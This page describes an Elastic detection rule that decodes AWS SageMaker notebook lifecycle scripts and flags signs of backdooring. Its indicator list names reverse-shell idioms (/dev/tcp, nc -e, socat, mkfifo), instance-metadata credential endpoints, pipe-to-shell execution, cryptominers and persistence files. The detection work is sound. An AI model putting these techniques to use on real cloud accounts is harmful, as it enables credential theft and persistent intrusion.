heroui logo

AWS SageMaker Notebook Lifecycle Configuration With Suspicious Script Content

Elastic Detection Rules

View Source
Summary
Detects suspicious content in AWS SageMaker notebook lifecycle configurations (OnStart or OnCreate) by base64-decoding the lifecycle script and scanning for high-signal indicators of malicious activity. The rule listens to CloudTrail events CreateNotebookInstanceLifecycleConfig/UpdateNotebookInstanceLifecycleConfig that succeed and originate from non-service principals, then decodes the field Esql_priv.aws_cloudtrail_lifecycle_script (base64) and checks for patterns indicative of reverse shells (e.g., /dev/tcp/, /dev/udp/, bash -i, nc -e, ncat, socat, mkfifo, import socket, pty.spawn, perl/ruby/php socket idioms), IMDS credential access (169.254.169.254, /latest/meta-data/, /latest/api/token), download-and-execute or decode-and-execute (| sh, | bash, base64 -d), cryptominer activity (xmrig, minerd, stratum+), and persistence indicators (authorized_keys, crontab, /etc/cron). A match signals a potential attempt to backdoor the notebook, steal the execution role’s credentials, or establish persistent code execution, especially since the script runs as root. The rule is a high-fidelity companion to lifecycle-configuration-change detections and provides targeted indicators to accelerate investigation. MITRE mappings include T1546 (Event Triggered Execution) and T1059 (Command and Scripting Interpreter, Unix Shell) across Execution and Persistence tactics.
Categories
  • Cloud
  • AWS
Data Sources
  • Cloud Service
ATT&CK Techniques
  • T1546
  • T1059
  • T1059.004
Created: 2026-06-29